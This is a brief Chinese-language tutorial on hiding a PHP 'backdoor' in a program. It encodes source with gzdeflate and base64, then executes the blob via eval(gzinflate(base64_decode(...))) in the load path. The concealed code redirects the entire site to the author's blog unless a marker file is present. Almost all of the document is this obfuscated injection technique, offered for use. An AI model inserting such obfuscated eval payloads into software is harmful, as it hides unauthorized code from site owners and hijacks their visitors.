首先将后门源代码加密,得到加密后的代码。

$encode = <<<EOFif(!file_exists(dirname(dirname(dirname(__FILE__))).'/blog.51cto.com.chinaleo')){ header('Location:https://blog.51cto.com/chinaleo'); exit();}EOF;echo base64_encode( gzdeflate( $encode ) );

得到字符串“48xM01BMy8xJjU+tyCwuKdZIySzKS8xNxaDj4908fVzj4zU1NfXU9ZMzMvMSc1Lz9ZJy8tP1TA2TS/L1kvNz1TU1q3m5FKAgIzUxJbVIQ90nPzmxJDM/zyqjpKTASl8fVQ/cLHVNa4ReoGtKNCACnLUA”,这就是密文

将密文用以下方式放在程序加载的路径上来执行。

eval( gzinflate( base64_decode( '48xM01BMy8xJjU+tyCwuKdZIySzKS8xNxaDj4908fVzj4zU1NfXU9ZMzMvMSc1Lz9ZJy8tP1TA2TS/L1kvNz1TU1q3m5FKAgIzUxJbVIQ90nPzmxJDM/zyqjpKTASl8fVQ/cLHVNa4ReoGtKNCACnLUA' ) ) );如果用户的文件夹里没有我的网站宣传文件“blog.51cto.com.chinaleo”,则将网站强制跳转到我的博客。